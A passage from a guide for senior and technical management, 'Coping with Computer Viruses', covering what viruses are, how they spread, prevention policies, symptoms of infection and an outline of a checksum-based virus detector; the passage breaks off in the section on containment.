+            2.7.3  Watching for Re-Infection   . . . . . . . . . .  20
+          2.8  Summary and Recommendations   . . . . . . . . . . .  21
+ 
+          For Further Reading  . . . . . . . . . . . . . . . . . .  23
+ 
+          Glossary   . . . . . . . . . . . . . . . . . . . . . . .  24
+ 
+          Appendix: Viral Infections in PC-DOS   . . . . . . . . .  27
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          Contents                                                 iii
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          PREFACE
+ 
+ 
+ 
+          While this document has been widely reviewed, and many
+          helpful suggestions have been incorporated, the authors are
+          entirely responsible for its present content.  It does not
+          represent the opinions, policies, or recommendations of IBM
+          or any other organization.
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          Preface                                                   iv
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          1.0  EXECUTIVE SUMMARY
+ 
+ 
+ 
+          Computer viruses present a relatively new kind of security
+          problem in computing systems.  The purpose of this section
+          is to acquaint the senior management of an organization with
+          the nature of the problem.  It also outlines some of the
+          steps that can be taken to reduce the organization's risk
+          from computer viruses and other, similar, problems.
+ 
+          Traditional computer security measures are helpful, but new
+          measures are needed to deal with the problems effectively.
+          The computer security management of the organization will
+          play a key role in reducing the risk.  But education and
+          ongoing participation of the users are also vital.
+ 
+ 
+ 
+ 
+          1.1  WHAT IS A COMPUTER VIRUS?
+ 
+ 
+          A computer virus is one kind of threat to the security and
+          integrity of computer systems.  Like other threats, a
+          computer virus can cause the loss or alteration of programs
+          or data, and can compromise their confidentiality.  Unlike
+          many other threats, a computer virus can spread from program
+          to program, and from system to system, without direct human
+          intervention.
+ 
+          The essential component of a virus is a set of instructions
+          which, when executed, spreads itself to other, previously
+          unaffected, programs or files.  A typical computer virus
+          performs two functions.  First, it copies itself into
+          previously-uninfected programs or files.  Second, (perhaps
+          after a specific number of executions, or on a specific
+          date) it executes whatever other instructions the virus
+          author included in it.  Depending on the motives of the
+          virus author, these instructions can do anything at all,
+          including displaying a message, erasing files or subtly
+          altering stored data.  In some cases, a virus may contain no
+          intentionally harmful or disruptive instructions at all.
+          Instead, it may cause damage by replicating itself and
+          taking up scarce resources, such as disk space, CPU time, or
+          network connections.
+ 
+          There are several problems similar to computer viruses.
+          They too have colorful names:  worms, bacteria, rabbits, and
+          so on.  Definitions of them are given in the glossary.  Each
+          shares the property of replicating itself within the
+          computing system.  This is the property on which we will
+          focus, using viruses as an example.  There are also a
+          variety of security issues other than viruses.  Here, we
+ 
+ 
+          Executive Summary                                          1
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          will deal only with viruses and related problems, since new
+          measures are required to deal with them effectively.
+ 
+ 
+ 
+          1.2  HOW CAN COMPUTER VIRUSES AFFECT AN ORGANIZATION?
+ 
+ 
+          Let us examine a particular sequence of events, by which a
+          virus could enter an organization and spread within it.
+          Suppose that the organization hires an outside person to
+          come in and perform some work.  Part of that person's work
+          involves working on one of the organization's personal
+          computers.  The person brings in a few programs to aid in
+          this work, such as a favorite text editor.
+ 
+          Without the person having realized it, the text editor may
+          be infected with a virus.  Using that editor on one of the
+          organization's machines causes the virus to spread from the
+          editor to one of the programs stored on the organization's
+          machine, perhaps to a spreadsheet program.  The virus has
+          now entered the organization.
+ 
+          Even when the outside person leaves, the virus remains on
+          the machine that it infected, in the spreadsheet program.
+          When an employee uses that spreadsheet subsequently, the
+          virus can spread to another program, perhaps to a directory
+          listing program that the employee keeps on the same floppy
+          disk as the spreadsheet data files.  The listing program is
+          then infected, and the infection can be spread to other
+          computers to which this floppy disk is taken.  If the
+          employee's personal computer is connected to the
+          organization's network, the employee may send the listing
+          program to another user over the network.  In either case,
+          the virus can spread to more users, and more machines, via
+          floppy disks or networks.  Each copy of the virus can make
+          multiple copies of itself, and can infect any program to
+          which it has access.  As a result, the virus may be able to
+          spread throughout the organization in a relatively short
+          time.
+ 
+          Each of the infected programs in each of the infected
+          machines can execute whatever other instructions the virus
+          author intended.  If these instructions are harmful or
+          disruptive, the pervasiveness of the virus may cause the
+          harm to be widespread.
+ 
+ 
+ 
+          1.3  HOW SERIOUS IS THE PROBLEM?
+ 
+ 
+          Traditional security measures have attempted to limit the
+          number of security incidents to an acceptable level.  A
+ 
+ 
+          Executive Summary                                          2
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          single incident of lost files in a year may be an acceptable
+          loss, for instance.  While this is important, it only
+          addresses part of the problem of viruses.  Since a single
+          virus may be able to  spread throughout an organization, the
+          damage that it could cause may be much greater than what
+          could be caused by any individual computer user.
+ 
+          Limiting the number of initial viral infections of an
+          organization is important, but it is often not feasible to
+          prevent them entirely.  As a result, it is important to be
+          able to deal with them when they occur.
+ 
+          Most actual viruses discovered to date have either been
+          relatively benign, or spread rather slowly.  The actual
+          damage that they have caused has been limited accordingly.
+          In some cases, though, thousands of machines have been
+          affected.  Viruses can easily be created which are much less
+          benign.  Their *potential* damage is indeed large.
+          Organizations should evaluate their vulnerability to this
+          new threat, and take actions to limit their risks.
+ 
+ 
+ 
+ 
+          1.4  SUMMARY AND RECOMMENDATIONS
+ 
+ 
+          o   A computer virus is a program that can infect other
+              programs by modifying them to include a copy of itself.
+              When the infected programs are executed, the virus
+              spreads itself to still other programs.
+ 
+          o   Viruses can spread rapidly in a network or computing
+              system and can cause widespread damage.
+ 
+          o   Unlike many other security threats, viruses can enter a
+              given computing system without anyone intending them to.
+ 
+ 
+          o   There are no known ways to make a general computing
+              system completely immune from viral attacks, but there
+              are steps you can take to decrease the risks:
+ 
+              -   Use good general security practices.  (For a more
+                  complete discussion of these points, and some
+                  examples of others, see reference (6).)
+ 
+                  --  Keep good backups of critical data and programs.
+                  --  Periodically review overall controls to
+                      determine weaknesses.
+                  --  Use access control facilities to limit access to
+                      information by users, consistent with their job
+                      duties and management policies.  Audit accesses
+                      that do occur.
+ 
+ 
+          Executive Summary                                          3
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+                  --  Do not use network connections to outside
+                      organizations without a mutual review of
+                      security practices.
+                  --  Consider limiting electronic mail communications
+                      to non-executable files.  Separate
+                      communications that must move executable files
+                      from electronic mail, so that they can be
+                      separately controlled.
+                  --  Make security education a prerequisite to any
+                      computer use.
+ 
+              -   Put a knowledgeable group in place to deal with
+                  virus incidents.
+ 
+                  --  The group may be a formal part of the
+                      organization, or may be an informal collection
+                      of knowledgeable people.
+ 
+                  --  The group should be responsible for educating
+                      users about the threat of viruses, providing
+                      accurate information about viruses, responding
+                      to reports of viruses, and dealing with viral
+                      infections when they occur.
+ 
+                  --  Make sure each employee who works with a
+                      computer knows how to contact this group if they
+                      suspect a viral infection.
+ 
+              -   Develop a plan to deal with viruses *before* there is
+                  a problem.
+ 
+                  --  Decrease the risks of an initial infection, from
+                      internal and external sources.
+                  --  Put mechanisms in place to detect viral
+                      infections quickly.
+                  --  Develop procedures to contain an infection once
+                      one is detected.
+                  --  Know how to recover from a viral infection.
+ 
+              -   Test the plan periodically, as you would test a fire
+                  evacuation plan.
+ 
+                  --  But *do not* use a real virus to test the plan!
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          Executive Summary                                          4
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          2.0  COPING WITH COMPUTER VIRUSES: A GUIDE FOR TECHNICAL
+          MANAGEMENT
+ 
+ 
+ 
+          Once an organization makes a commitment to deal with the
+          problems of computer viruses, there are specific areas which
+          should receive attention.  The purpose of this section is to
+          acquaint technical management with the problems and to
+          indicate the actions that can be taken to limit the risks
+          posed by viruses.
+ 
+ 
+ 
+          2.1  HOW VIRUSES INFECT COMPUTING SYSTEMS
+ 
+ 
+          There are many ways in which a system can become infected
+          with a virus.  Any time a program is run which can alter one
+          or more other programs, there is the possibility of viral
+          infection.  Any time a user executes a program which is
+          written by anyone else, compiled by a compiler, or linked
+          with run time libraries, all the resources to which that
+          program has access are in the hands of every person who
+          contributed to that program, that compiler, or those
+          libraries.
+ 
+          The initial introduction of an infected program can occur
+          through a large variety of channels, including:
+ 
+          o   Software introduced into or used on the system by an
+              outsider who had access to the system,
+ 
+          o   Software used at home by an employee whose home computer
+              system is, unknown to the employee, itself infected,
+ 
+          o   Software purchased from a commercial software company
+              whose production facilities are infected,
+ 
+          o   Software that turns out to be infected that has been
+              down-loaded from public bulletin boards for business
+              use, or by employees,
+ 
+          o   Software intentionally infected by a malicious or
+              disgruntled employee,
+ 
+          o   *Any* other time that a piece of software (including
+              programs, operating systems, and so on) is created
+              within the organization, or brought in from *any*
+              outside source.
+ 
+          See the appendix for an example of sources and locations of
+          possible infection for one operating system.
+ 
+ 
+          Coping with Computer Viruses: A Guide for Technical
+          Management                                                 5
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          2.2  HOW VIRUSES DIFFER FROM OTHER SECURITY THREATS
+ 
+ 
+ 
+          There are many kinds of threats to security.  Threats
+          traceable to dial-in systems are greatly reduced with the
+          use of call-back systems.  Simple threats created by
+          disgruntled employees can often be traced to the person
+          responsible.  One important thing that makes the virus
+          different from all the rest is its untraceability.  Except
+          in rare cases, the only way a virus' author becomes known is
+          if the author admits to ownership.  As a result, an author
+          can create a virus with reasonable certainty that he will
+          not be discovered.  This allows great latitude in the design
+          of the destructive portion of the virus.
+ 
+          The only perfect ways to protect against viral infection are
+          isolation and reduced functionality.  A computer system
+          cannot be infected if it runs only one fixed program, and
+          cannot have new programs either loaded or created on it.
+          But this is clearly not very useful in many circumstances.
+          So there is almost always some exposure.  As with other
+          security concerns, it is a matter of weighing benefits,
+          practicality, and potential risks, and then taking
+          cost-effective action to help control those risks.
+ 
+          Viruses exhibit elements of many other security threats.
+          (See the Glossary for a summary of some of these threats.)
+          There are important differences, though.  Dr. Fred Cohen,
+          who has done much of the original research on computer
+          viruses, defines a virus as:
+ 
+              a program that can "infect" other programs by modifying
+              them to include a possibly evolved copy of itself.  (See
+              reference (1).)
+ 
+          But a virus is more than the part that replicates itself.
+          There is usually also a potentially damaging portion.  This
+          portion could be a "time bomb" (on November 11th, display a
+          political message), a "logic bomb" (when it sees a certain
+          write to disk, it also corrupts the file structure), or
+          anything else the virus author can design.  The variety of
+          possible effects is part of the reason why the notion of a
+          virus is so confusing to many people.  The term "virus" is
+          sometimes misused to refer to anything undesirable that can
+          happen to a computer.  This is incorrect.  The thing that
+          makes viruses and related threats different from other
+          problems is that they spread.
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          Coping with Computer Viruses: A Guide for Technical
+          Management                                                 6
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          2.3  GENERAL SECURITY POLICIES
+ 
+ 
+ 
+          2.3.1  User Education
+ 
+ 
+          Good security policies depend on the knowledge and
+          cooperation of the users.  This is just as true of security
+          against viruses as it is of policies about password
+          management.  Users should be aware of the dangers that
+          exist, should know what to do if they suspect they have
+          found a security problem.  In particular, they should know
+          whom to call if they have questions or suspicions, and
+          should know what to do, and what not to do, to minimize
+          security risks.  Users should be encouraged to feel that
+          security measures are things that they want to do for their
+          own benefit, rather than things that are required for no
+          rational reason.
+ 
+          A strategy to detect and contain viruses is described below.
+          An important part of that strategy is for users to know whom
+          to call if they see a system problem that may be the result
+          of a virus.  Someone should always be available to work with
+          the user in determining if a problem exists, and to report
+          the problem to a central source of information if it is
+          serious.  This central source must have the ability to
+          inform the necessary people of the problem quickly and
+          reliably, and to set in motion the process of containing and
+          solving the problem.  More detailed suggestions for this
+          mechanism will be given below, but each stage depends on
+          education.  It is important to educate the end users, the
+          first-level support people, and management involved at all
+          levels, since they must take the necessary actions quickly
+          when a viral infection is detected.
+ 
+ 
+ 
+          2.3.2  Backups
+ 
+ 
+          Even without the threat of viruses, good backups are an
+          important part of system management.  When a program or a
+          data file is lost, a good set of backups can save many days
+          or months of work.  The potential harm caused by computer
+          viruses only increases the need for backups.
+ 
+          Although they are necessary for recovery, backups can also
+          present a place for a virus to hide.  When a virus attack
+          has been stopped, and the virus removed from all software on
+          the system, the obvious way to recover altered or lost files
+          is by restoring them from backups.  Great care must be taken
+          not to reintroduce the virus into the system in the process!
+ 
+ 
+          Coping with Computer Viruses: A Guide for Technical
+          Management                                                 7
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          All backups should be inspected to ensure that the virus is
+          not present in any file on any backup.  Until a backup has
+          been certified "clean," it should not be used, unless
+          certain files on it are not recoverable through other means.
+          Even in this case, it is necessary to be very careful to
+          restore only objects which the virus did not infect or
+          otherwise change.  The behavior of the virus should be well
+          understood before any restoration from backup is attempted.
+ 
+ 
+ 
+          2.4  DECREASING THE RISK OF VIRAL INFECTION
+ 
+ 
+          Viruses can spread from one user to another on a single
+          system, and from one system to another.  A virus can enter a
+          company either by being written within the company, or by
+          being brought in from the outside.  Although a virus cannot
+          be written accidentally, a virus may be brought in from the
+          outside either intentionally or unintentionally.  Viruses
+          can enter a company because a program is brought in from
+          outside which is infected, even though the person who brings
+          it in does not know it.
+ 
+          Because sharing of programs between people is so
+          commonplace, it is difficult to prevent an initial infection
+          from "outside." An employee may take a program home to use
+          it for business purposes on his or her home computer, where
+          it becomes infected.  When the program is returned to the
+          workplace, the infection can spread to the workplace.
+          Similarly, an outside person can bring a set of programs
+          into a company in order to perform work desired by the
+          company.  If these programs are infected, and they are
+          executed on the company's systems, these systems may also
+          become infected.
+ 
+          There are two major ways to prevent infection in the first
+          place, and to limit the spread of an existing infection:
+          isolating systems, and limiting their function.
+ 
+ 
+ 
+          2.4.1  Isolated Systems
+ 
+ 
+          Since viruses spread to new users and systems only when
+          information is shared or communicated, you can prevent
+          viruses from spreading by isolating users and systems.
+          Systems that are connected to other systems by a network can
+          spread a virus across that network.  Isolating systems from
+          the network will prevent their being infected by that
+          network.  If a company maintains connections with other
+          companies (or universities, or other institutions) by a
+ 
+ 
+          Coping with Computer Viruses: A Guide for Technical
+          Management                                                 8
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          network, a virus may be able to enter the company through
+          that network.  By isolating the company from such external
+          networks, it cannot be infected by these networks.
+ 
+          This is a reasonable policy to follow when possible,
+          especially for those systems which contain especially
+          sensitive programs and data.  It is impractical in many
+          cases, though.  Networks are valuable components of a
+          computing system.  The easy sharing of programs and data
+          that they make possible can add substantially to the
+          productivity of a company.  You should be aware, however,
+          that this sharing also increases the risk of viral infection
+          to these systems.  This is especially true if the network
+          security measures have not been designed with viruses and
+          related threats in mind.
+ 
+          Your organization may wish to limit the kinds of access to
+          systems afforded to those outside the organization.  In many
+          cases, users of external systems may be less motivated to be
+          benevolent to your systems than internal users are.  This
+          may make it worthwhile to limit the ability of external
+          users to transmit executable files, or have full interactive
+          access, to internal systems.
+ 
+          Similarly, movement of programs between personal computers
+          on floppy disks can result in one system infecting another.
+          If an employee's home computer is infected, for instance,
+          bringing a program (or even a bootable disk) from home to
+          work could result in the work computer becoming infected.
+          You may want to have a policy that employees should not
+          bring programs or bootable disks between work and home.  Or,
+          you may want to have a policy that employees should use
+          virus-detection tools on their home computers as well as
+          their work computers.
+ 
+ 
+ 
+ 
+          2.4.2  Limited-Function Systems
+ 
+ 
+          Since viruses must be able to infect other executable
+          objects in order to spread, you can help prevent viruses
+          from spreading by eliminating this ability from a computing
+          system.  This can be done in some circumstances by
+          restricting the ability to add or change programs on a
+          system.
+ 
+          If general-purpose programming must be done on a system, as
+          is the case with development systems, it is not possible to
+          prevent users from creating or adding new programs.  On
+          these systems, it is not possible to prevent the
+          introduction of viruses under every possible condition.
+ 
+ 
+          Coping with Computer Viruses: A Guide for Technical
+          Management                                                 9
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          Many companies have computing systems, including
+          workstations and personal computers, that are not used for
+          general-purpose programming.  A bank, for instance, may use
+          personal computers as teller stations, to handle a fixed set
+          of teller transactions.  Since the tellers need not program
+          these systems, it may be possible to strictly limit the
+          introduction of new programs and thus greatly limit the
+          introduction of viruses onto them.
+ 
+          This is a prudent policy.  Whenever practical, limit the
+          ability of users to add or change programs on the systems
+          they use.  This ability should be restricted to authorized
+          personnel, and these personnel should use every means
+          available to them to check any new programs for viruses
+          before they are installed in the limited-function systems.
+          As long as no new programs are introduced, no new viruses
+          can be introduced onto these systems.
+ 
+          Remember, though, that the trend in personal workstations
+          has been toward the empowerment of the individual user,
+          including giving the user the ability to create programs to
+          suit his or her own needs.  Thus, it may not be practical
+          and competitive in the long run to impose restrictions on
+          many systems.  The risk of viral infection must be weighed
+          against the benefits of providing power and flexibility to
+          the individual user.
+ 
+ 
+ 
+ 
+          2.4.3  Policies for Software Repositories
+ 
+ 
+ 
+          Software repositories are places in which programs reside
+          which may be used by a number of people.  These may be disks
+          on a mainframe, which can be accessed from a number of
+          different users' accounts.  They may also be disks on a
+          local area network file server, from which many users get
+          common programs.
+ 
+          These repositories can pose more of a risk in the spread of
+          viruses than most "private" program storage locations.  If a
+          commonly-accessed program becomes infected, such as a text
+          editor used by an entire department, the entire department
+          can become infected very quickly.  So, extra care is
+          required to prevent infection of repositories.
+ 
+          A policy can be put into place that requires each program
+          added to a repository to be checked thoroughly for possible
+          infection.  It is helpful, for instance, to use tools to
+          ensure that it is not infected with any of the already-known
+          viruses.
+ 
+ 
+          Coping with Computer Viruses: A Guide for Technical
+          Management                                                10
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          In cases in which users who access the repository deal with
+          especially sensitive programs and data, it may be prudent to
+          enforce even more stringent policies.  Programs to be added
+          may be tested first on isolated systems, to see if they show
+          any signs of infecting other programs.  Or, a repository
+          team may inspect the source code of the program for viral
+          code.  If no viral code is found, the repository team can
+          compile the program on an isolated system that has been
+          certified to be free of viruses.  In such a case, the only
+          object code allowed on the repository would come directly
+          from the team's compilation on its isolated system.
+ 
+          Repositories can also be helpful in detecting and
+          controlling viruses.  Consider the situation in which most
+          users run a significant amount of the software that they
+          execute from a central server to which they do not have
+          write access, rather than from individual writeable disks.
+          Since the users do not regularly update this software,
+          viruses will not be able to spread as quickly between these
+          users.  If a program on a central repository becomes
+          infected, it may be comparatively simple to replace it with
+          an uninfected version (or remove it entirely).  It may be
+          more difficult to screen all programs on hundreds of
+          individual systems.  It may also be easier to audit the
+          usage of, and updates to, a single software repository, as
+          opposed to a large number of individual systems.
+ 
+          There are a variety of other areas in many organizations
+          which could spread viruses rapidly, and hence which should
+          be carefully controlled.  Internal software distribution
+          centers, for instance, could spread a virus widely if they
+          were infected.  Similarly, a software lending library, if
+          infected, may transmit a virus to many other users before it
+          is detected.  Walk-in demo rooms and educational centers are
+          also potential problems.  In general, any place from which
+          software is widely distributed, and which has uncontrolled
+          software importation, needs special attention.
+ 
+ 
+ 
+ 
+          2.4.4  Policies for Production Systems
+ 
+ 
+          Production systems are those systems which are used to
+          prepare internally-developed programs for distribution
+          either within a company, or for sale to external customers.
+          If these systems were infected with a virus, the virus could
+          spread to programs used widely within the company, or to
+          programs used by the company's customers.  In the former
+          case, this could spread the virus widely throughout the
+          company.  In the latter case, it could damage the reputation
+          of the company with its customers.  There has been
+ 
+ 
+          Coping with Computer Viruses: A Guide for Technical
+          Management                                                11
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          documented cases of companies accidentally shipping
+          virus-infected program products to customers.
+ 
+          Since the infection of production systems could have serious
+          consequences, you should be especially careful about
+          protecting them.  The key to this is the institution of
+          stringent change control policies on production systems.
+ 
+          They should be strongly isolated from non-production
+          systems, so that only known, authorized files can be put
+          onto the system.  Each file should be checked for infection,
+          to whatever extent possible.  Installing object code on
+          these systems should be avoided whenever possible.  Rather,
+          source code should be installed, and compiled locally with a
+          trusted compiler.  Where the impact of a viral infection
+          would be particularly large, it may be important to inspect
+          the source code before it is compiled, to avoid the
+          introduction of a virus through the source code.  If object
+          code must be installed, its origin should be verified
+          beforehand.  For instance, object code for a personal
+          computer could be installed only from an original,
+          write-protected distribution disk, which has been found to
+          be free of viruses.
+ 
+          In addition, virus-checking programs (see below) should be
+          run frequently on production systems.  On a multitasking
+          system, it may be possible to run a virus detector
+          continuously in the background.  Further, a policy can be
+          instituted which ensures that a virus detector will be
+          executed at least once between the time that new files are
+          installed on the system, and the time that any files are
+          exported from the system.
+ 
+ 
+ 
+          2.5  DETECTING VIRAL INFECTIONS
+ 
+ 
+          With the possible exception of isolation, all of the methods
+          outlined above for preventing viral infections are only
+          somewhat reliable.  Viruses can still reach some systems
+          despite the implementation of preventative measures.
+          Indeed, no perfect defense exists that still allows
+          programming, and sharing of executable information.  There
+          is no "one time fix," as there is for many other computer
+          security problems.  This is a hole that cannot be plugged
+          completely.  Defenses will have to be improved with time to
+          deal with new classes of viruses.  Because of this, virus
+          *detection* is an important component of system security.
+ 
+          The two most important resources available for the detection
+          of viruses are watchful users and watchful programs.  The
+          best approaches to virus detection include both.  The users
+ 
+ 
+          Coping with Computer Viruses: A Guide for Technical
+          Management                                                12
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          should be aware of the possibility of viruses, just as they
+          are aware of the need for backups, and to know what kinds of
+          things to watch for.  System programs and utilities should
+          be available to help the users, and the computer center
+          staff, to take advantage of this awareness.
+ 
+ 
+ 
+          2.5.1  Watching for Unexpected Things Happening
+ 
+ 
+          If users are aware of the kinds of visible things that are
+          known to happen in systems that are virus-infected, these
+          users can serve as an important line of defense.  Users
+          should know that odd behavior in a computer system may be a
+          symptom of penetration by a virus, and they should know to
+          whom such odd behavior should be reported.
+ 
+          On the other hand, it is a fact that odd behavior is usually
+          *not* caused by viral penetration.  Software bugs, user
+          errors, and hardware failures are much more common.  It is
+          important to avoid unfounded rumors of viral infections, as
+          dealing with such "false alarms" can be costly.  An actual
+          infection, however, may require rapid action.  So the group
+          to which users report oddities must have the skill to
+          determine which reports are almost certainly due to one of
+          these more common causes, and which merit closer
+          investigation for possible viral infection.  One obvious
+          choice for such a group is within the computing center or
+          "help desk," since the computing center staff probably
+          already has a good idea of what sorts of oddities are
+          "business as usual."
+ 
+ 
+ 
+          2.5.2  Some Symptoms of Known Viruses
+ 
+ 
+ 
+ 
+          2.5.2.1  Workstation Viruses
+ 
+ 
+          This section lists specific oddities that are known to occur
+          in workstations infected with particular viruses that have
+          already occurred.  Some of the things in these examples only
+          occur once the virus is in place, and is triggered to
+          perform its particular function.  Others occur while the
+          virus is still spreading.  Some things users should know to
+          watch for include:
+ 
+          o   Unexpected changes in the time stamps or length of
+              files, particularly executable files,
+ 
+ 
+          Coping with Computer Viruses: A Guide for Technical
+          Management                                                13
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          o   Programs taking longer to start, or running more slowly
+              than usual,
+          o   Programs attempting to write to write-protected media
+              for no apparent reason,
+          o   Unexplained decreases in the amount of available
+              workstation memory, or increases in areas marked as
+              "bad" on magnetic media,
+          o   Executable files unexpectedly vanishing,
+          o   Workstations unexpectedly "rebooting" when certain
+              previously-correct programs are run, or a relatively
+              constant amount of time after being turned on,
+          o   Unusual things appearing on displays, including
+              "scrolling" of odd parts of the screen, or the
+              unexpected appearance of "bouncing balls" or odd
+              messages,
+          o   Unexpected changes to volume labels on disks and other
+              media,
+          o   An unusual load on local networks or other communication
+              links, especially when multiple copies of the same data
+              are being sent at once.
+ 
+          It is important to remember, though, that future viruses may
+          do none of these things.  Users should be alert to oddities
+          in general and should have a place to report them, as
+          recommended above.
+ 
+ 
+ 
+ 
+          2.5.2.2  Mainframe Viruses
+ 
+ 
+ 
+          Viruses in multi-user computer systems share some of the
+          typical behaviors of viruses in single-user workstations.
+          In particular, lengths or time stamps of executable files
+          may change, programs may load or execute more slowly,
+          unusual errors (especially relating to disk-writes) may
+          occur, files may vanish or proliferate, and odd things may
+          appear on displays.  If the virus is attempting to spread
+          between users, users may also notice "outgoing mail" that
+          they did not intend to send, "links" to other user's
+          information that they did not intentionally establish, and
+          similar phenomena.
+ 
+          Generally, the same comments apply in this environment as in
+          the single-user workstation environment.  Future viruses may
+          do none of these things, and users should be sensitive to
+          suspicious oddities in general, and have a place to which to
+          report them.
+ 
+ 
+ 
+ 
+ 
+          Coping with Computer Viruses: A Guide for Technical
+          Management                                                14
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          2.5.3  Watching for Changes to Executable Objects
+ 
+ 
+ 
+          Users are not the only line of defense in the detection of
+          viruses.  It is comparatively simple to create programs that
+          will detect the presence and the spread of the simpler
+          classes of viruses.  Such programs can go a long way in
+          "raising the bar" against computer viruses.
+ 
+          One effective approach to detecting simple viruses involves
+          notifying the user of changes to the contents of executable
+          objects (program files, "boot records" on magnetic media,
+          and so forth).  Users can be provided with a program to be
+          run once a day which will examine the executable objects to
+          be checked, and compare their characteristics with those
+          found the last time the program was run.  (This could be run
+          at the same time as the backup program, for instance.)  The
+          user can then be presented with a list of objects that have
+          changed.  If things have changed that should not have, the
+          user can contact the appropriate people to investigate.  If
+          certain objects that should seldom or never change (such as
+          the operating system files themselves) are different, the
+          user can be specially warned, and urged to contact the
+          appropriate people.
+ 
+          Often, a central system programming group has control over a
+          large multi-user computing system.  That group can execute
+          this sort of program periodically, to check for changes to
+          common operating system utilities, and to the operating
+          system itself.  Because viruses can often spread to
+          privileged users, they are quite capable of infecting even
+          those parts of the system that require the highest authority
+          to access.
+ 
+          The frequency with which virus detectors should be used
+          depends upon the rate at which executables are transmitted,
+          and the value of the information assets on the systems.
+          Workstations that are not connected to networks can exchange
+          information via floppy disks.  The known computer viruses
+          that propagate by way of floppy disks do so relatively
+          slowly.  It may take days, or weeks, or even months for such
+          a virus to propagate across a large organization.  In this
+          case, running virus detectors once a day, or once a week,
+          may be sufficient.  For systems connected to networks,
+          especially large-scale networks, the situation is much
+          different.  Experience has shown network viruses to be
+          capable of spreading very rapidly across the network.  In
+          some cases, replicating programs have spread across
+          nationwide networks in a matter of hours or days.  In these
+          cases, it may be important to run virus detectors hourly or
+          daily.
+ 
+ 
+ 
+          Coping with Computer Viruses: A Guide for Technical
+          Management                                                15
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          Below is an outline of one possible implementation of a
+          virus detecting program.  It is for illustration only; many
+          different structures would do the job as well or better.
+ 
+          1.  The program obtains a list of files to be checked.  For
+              PC-DOS, for instance, this should include .COM and .EXE
+              files, any files that are listed as device drivers in
+              the CONFIG.SYS file, the CONFIG.SYS file itself, and any
+              other executables such as batch files or BASIC programs.
+          2.  For each of these files, the program
+              o   Determines the time/date and length of the file from
+                  the operating system.
+              o   If desired, actually reads the data in the file, and
+                  performs a calculation such as a CRC (cyclic
+                  redundancy check) on the data.  (The number of files
+                  checked in such detail depends on the importance of
+                  the file, the speed of the program, and the amount
+                  of time the user is willing to spend.)
+              o   Compares this file information (time/date, length,
+                  and perhaps CRC or other code) with the database
+                  generated last time the program was run.
+              o   If the file was not present the last time the
+                  program was run, or if the information in the
+                  previous database was different from the information
+                  just obtained, the program records that the file is
+                  new or changed.
+          3.  After checking all relevant files, the program reads all
+              other known executable objects in the system(1), and
+              compares their CRC or other codes with the values in the
+              database, and records any changes.
+          4.  When all the existing objects have been checked in this
+              way, the program updates the database for next time and
+              presents all its findings to the user.
+          5.  On the basis of this information, the user can decide
+              whether any of the reported changes are suspicious, and
+              worth reporting.
+ 
+          This method is by no means foolproof.  A sophisticated virus
+          could do a variety of things.  It could change an executable
+          object without altering the time, date, length, or CRC code.
+          It could only alter objects that had been legitimately
+          changed recently.  It could act directly on the database
+          itself and thus escape detection.  More sophisticated
+          versions of the program outlined here can provide
+          significantly more foolproof detection.  It is advantageous
+          to have many different virus detectors in place at the same
+ 
+          ----------------
+          (1) For PC-DOS, this would typically include the boot record
+              on a floppy diskette, and the master and partition boot
+              records on hard disks.  For multi-user operating
+              systems, this might include "shared system images," or
+              "IPL datasets" or equivalent objects.
+ 
+ 
+          Coping with Computer Viruses: A Guide for Technical
+          Management                                                16
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          time.  That way, a virus that can evade one detector may be
+          caught by another.  Nevertheless, user awareness, and
+          procedures for recovery in the event of an infection that is
+          not detected until too late, are both still vital.
+ 
+ 
+ 
+          2.5.4  Using External Information Sources
+ 
+ 
+          Software viruses are able to spread because information
+          flows so quickly in the modern world.  That same information
+          flow can help in the detection of viruses.  Newspapers,
+          magazines, journals, and network discussion groups have
+          carried significant amounts of material dealing with
+          computer viruses and other forms of malicious software.
+          These sources of information can be valuable in maintaining
+          awareness of what hazards exist, and what measures are
+          available to detect or prevent specific viruses.  This kind
+          of information can be invaluable to the people in your
+          organization charged with investigating suspicious events
+          reported by users, and deciding which ones to follow up on.
+          On the other hand, these channels also carry a certain
+          amount of inevitable misinformation, and care should be
+          taken not to react to, or spread, rumors that seem to have
+          no likely basis in fact.
+ 
+ 
+ 
+          2.6  CONTAINING VIRAL INFECTIONS
+ 
+ 
+          Having procedures in place to detect viral infection is very
+          important.  By itself, however, it is of little use.  The
+          individual who makes the first detection must have a
+          procedure to follow to verify the problem and to make sure
+          that appropriate action occurs.  If the information supplied
+          in the detection phase is allowed to "fall between the
+          cracks," even for a relatively short time, the benefit of
+          detection can easily be lost.
+ 
+ 
+ 
+ 
+          2.6.1  The Importance of Early Detection
+ 
+ 
+          Computer viruses generally spread exponentially.  If a virus
